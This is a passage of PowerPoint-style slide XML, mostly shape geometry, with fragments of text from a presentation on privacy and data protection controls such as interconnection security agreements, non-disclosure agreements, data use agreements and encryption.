                  <a:lnTo>
                    <a:pt x="5901944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869186" y="3204210"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5901944" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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2052320" y="4017010"/>
            <a:ext cx="927735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Requ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ment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rc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ec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fede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sy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m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w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thir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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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par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sy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ms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52320" y="3261181"/>
            <a:ext cx="536511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Interconnection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Security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Agreement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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(ISA)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847469" y="4950333"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="4950333"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="5429250"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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869186" y="4959858"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="5901944" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5901944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869186" y="4959858"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5901944" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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2052320" y="5756275"/>
            <a:ext cx="580453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Legal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basis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protecting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information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assets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052320" y="4995417"/>
            <a:ext cx="436816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80">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Non-Disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Agreement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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(NDA)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847469" y="6705981"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="6705981"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="7184898"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88645"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88645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869186" y="6715506"/>
              <a:ext cx="5980430" cy="447040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="447040">
                  <a:moveTo>
                    <a:pt x="5905754" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74421" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45434" y="5842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21780" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5842" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="446532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="446532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="74422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974334" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5958395" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5934741" y="5842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5905754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869186" y="6715506"/>
              <a:ext cx="5980430" cy="447040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="447040">
                  <a:moveTo>
                    <a:pt x="74421" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5905754" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5934741" y="5842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5958395" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974334" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="74422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="446532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="446532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5842" y="45434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21780" y="21780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45434" y="5842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="0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2052320" y="7402194"/>
            <a:ext cx="630364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dirty="0" sz="2200" spc="-14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analysis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methods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subjected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re-identification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techniques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973579" y="6731507"/>
            <a:ext cx="5875020" cy="429895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="39405A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="32384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Sharing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Use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Agreement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40985" y="4258436"/>
            <a:ext cx="657415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85"/>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110"/>
              <a:t>Controls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2711" y="306451"/>
            <a:ext cx="282956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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection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14288" y="760476"/>
            <a:ext cx="406755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84019" y="1882292"/>
            <a:ext cx="11884025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185410" marR="5080" indent="-5173345">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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protection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approach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securing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information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with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encryption.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commonly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referred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as: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135461" y="3734117"/>
            <a:ext cx="4476115" cy="3263265"/>
            <a:chOff x="6135461" y="3734117"/>
            <a:chExt cx="4476115" cy="3263265"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6140224" y="3738879"/>
              <a:ext cx="3999229" cy="3253740"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3999229" h="3253740">
                  <a:moveTo>
                    <a:pt x="3570703" y="27050"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3600296" y="65466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628810" y="104368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3656248" y="143736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682612" y="183553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3707903" y="223800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3732125" y="264459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3755280" y="305512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3777369" y="346940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3798395" y="388725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3818360" y="430848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3837266" y="473292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3855115" y="516038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3871911" y="559068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3887654" y="602363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3902347" y="645905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3915992" y="689676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3928591" y="733657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3940147" y="777830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3950662" y="822176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3960138" y="866679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3968577" y="911318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3975982" y="956076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3982354" y="1000934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3987695" y="1045874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3992009" y="1090878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995297" y="1135928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3997561" y="1181004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3998803" y="1226089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3999026" y="1271165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3998232" y="1316213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3996424" y="1361214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3993602" y="1406151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989770" y="1451005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984930" y="1495758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3979083" y="1540391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3972233" y="1584886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964381" y="1629226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3955529" y="1673390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3945680" y="1717362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3934835" y="1761122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3922998" y="1804653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3910170" y="1847937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3896353" y="1890953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881550" y="1933686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3865763" y="1976116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848994" y="2018224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3831244" y="2059993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3812518" y="2101404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3792816" y="2142439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3772140" y="2183079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3750494" y="2223307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727878" y="2263104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3704296" y="2302451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3679750" y="2341330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3654241" y="2379723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627772" y="2417612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600346" y="2454978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571963" y="2491803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3542627" y="2528068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512340" y="2563756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481104" y="2598847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448920" y="2633324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3415792" y="2667169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381722" y="2700362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3346711" y="2732886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3310762" y="2764722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273877" y="2795852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3236058" y="2826258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3197524" y="2855757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3158503" y="2884181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3119013" y="2911532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079074" y="2937812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3038703" y="2963024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997919" y="2987170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2956740" y="3010251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915185" y="3032271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873272" y="3053231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2831019" y="3073133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788444" y="3091979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2745567" y="3109773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2702405" y="3126515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658978" y="3142209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2615302" y="3156856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2571397" y="3170458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2527281" y="3183018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482973" y="3194538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2438490" y="3205020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393851" y="3214467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2349075" y="3222879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2304180" y="3230261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259185" y="3236613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2214107" y="3241938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168964" y="3246238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123777" y="3249515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078562" y="3251773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033339" y="3253011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1988125" y="3253234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942939" y="3252443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1897799" y="3250640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852724" y="3247827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1807733" y="3244007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1762842" y="3239182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1718072" y="3233354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1673440" y="3226525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628965" y="3218697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1584664" y="3209873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1540557" y="3200055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496662" y="3189245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1452997" y="3177444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1409581" y="3164656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366431" y="3150883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323567" y="3136126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1281007" y="3120388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238768" y="3103670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196870" y="3085976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155331" y="3067308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114169" y="3047667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073403" y="3027056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033051" y="3005476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="993131" y="2982931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="953662" y="2959422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914662" y="2934952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876149" y="2909522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838143" y="2883135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800661" y="2855793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="763721" y="2827498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727342" y="2798253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691543" y="2768059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656342" y="2736919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621757" y="2704835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587806" y="2671810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554509" y="2637844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521882" y="2602941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489946" y="2567103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458717" y="2530331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428215" y="2492629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398285" y="2453751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369440" y="2414336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341681" y="2374401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315007" y="2333968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289419" y="2293057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264915" y="2251686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241497" y="2209877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219163" y="2167648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197913" y="2125021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177748" y="2082014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158667" y="2038648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140670" y="1994943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123757" y="1950918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107927" y="1906594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93181" y="1861990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79518" y="1817127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66939" y="1772024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55442" y="1726701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45028" y="1681178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35697" y="1635476"/>
                  </a:lnTo>
                  <a:lnTo>
